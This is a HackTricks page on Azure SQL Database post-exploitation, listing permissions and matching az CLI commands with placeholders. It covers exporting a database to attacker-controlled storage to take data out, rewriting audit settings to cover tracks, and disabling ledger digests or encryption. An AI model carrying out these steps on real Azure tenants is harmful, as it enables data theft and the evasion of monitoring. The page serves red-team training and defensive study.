Az - SQL Database Post Exploitation
Reading time: 6 minutes
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SQL Database Post Exploitation
For more information about SQL Database check:
Microsoft.Sql/servers/databases/read
, Microsoft.Sql/servers/read
&& Microsoft.Sql/servers/databases/write
With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
# Create Database
az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>
# Update Database
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>
With this permissions (Microsoft.Sql/servers/read
&& Microsoft.Sql/servers/databases/write
) you can restore a deleted database:
az sql db restore \
--dest-name <new_database_name> \
--name <original_database_name> \
--resource-group <resource_group> \
--server <server_name> \
--deleted-time "<deleted_time_ISO_format>"
Microsoft.Sql/servers/elasticPools/write
&& Microsoft.Sql/servers/elasticPools/read
With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
# Create Elastic Pool
az sql elastic-pool create \
--name <new-elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--edition <edition> \
--dtu <dtu-value>
# Update Elastic Pool
az sql elastic-pool update \
--name <elastic-pool-name> \
--server <server-name> \
--resource-group <resource-group> \
--dtu <new-dtu-value> \
--tags <key=value>
Microsoft.Sql/servers/auditingSettings/read
&& Microsoft.Sql/servers/auditingSettings/write
With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.
az sql server audit-policy update \
--server <server_name> \
--resource-group <resource_group_name> \
--state Enabled \
--storage-account <storage_account_name> \
--retention-days 7
Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read
, Microsoft.Sql/servers/connectionPolicies/read
&& Microsoft.Sql/servers/connectionPolicies/write
With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings
az sql server connection-policy update \
--server <server_name> \
--resource-group <resource_group_name> \
--connection-type <Proxy|Redirect|Default>
Microsoft.Sql/servers/databases/export/action
With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.
az sql db export \
--server <server_name> \
--resource-group <resource_group_name> \
--name <database_name> \
--storage-uri <storage_blob_uri> \
--storage-key-type SharedAccessKey \
--admin-user <admin_username> \
--admin-password <admin_password>
Microsoft.Sql/servers/databases/import/action
With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.
az sql db import --admin-user <admin-user> \
--admin-password <admin-password> \
--name <target-database-name> \
--server <azure-sql-server-name> \
--resource-group <resource-group-name> \
--storage-key-type SharedAccessKey \
--storage-key <storage-account-key> \
--storage-uri `https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac`
Microsoft.Sql/servers/connectionPolicies/write
&& Microsoft.Sql/servers/connectionPolicies/read
With this permissions, a user can modify and retrieve the connection policies of an Azure SQL server. These permissions allow someone to change how clients connect to the server—choosing between methods like redirect or proxy—which could be exploited to weaken security, redirect traffic, or intercept sensitive data if misconfigured.
az sql server conn-policy update \
--resource-group <resource_group> \
--server <server_name> \
--connection-policy <policy>
Microsoft.Sql/servers/keys/write
&& Microsoft.Sql/servers/keys/read
With this permissions, a user can update and retrieve encryption keys associated with an Azure SQL Server. These keys are often used for securing sensitive data through encryption, so manipulating them could compromise data security by allowing unauthorized decryption or key rotation changes.
az sql server key create \
--resource-group MyResourceGroup \
--server MyServer \
--kid "https://mykeyvault.vault.azure.net/keys/mykey/1234567890abcdef
Microsoft.Sql/servers/databases/ledgerDigestUploads/disable/action
, Microsoft.Sql/locations/ledgerDigestUploadsAzureAsyncOperation/read
, Microsoft.Sql/locations/ledgerDigestUploadsOperationResults/read
This permissions permission allows disabling Ledger Digest for an Azure SQL Database, which stops the periodic uploading of cryptographic digest records to Azure Blob Storage that verifies the integrity of data.
az sql db ledger-digest-uploads disable \
--name ledgerDB \
--resource-group myResourceGroup \
--server my-sql-server
Microsoft.Sql/servers/databases/transparentDataEncryption/write
, Microsoft.Sql/locations/transparentDataEncryptionAzureAsyncOperation/read
, Microsoft.Sql/servers/databases/transparentDataEncryption/read
This permission allows an authorized user or attacker to enable, disable, or modify Transparent Data Encryption (TDE) settings on an Azure SQL database, potentially impacting data security by altering encryption configurations.
az sql db tde set \
--database <database-name> \
--resource-group <resource-group-name> \
--server <server-name> \
--status <Enabled|Disabled>
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.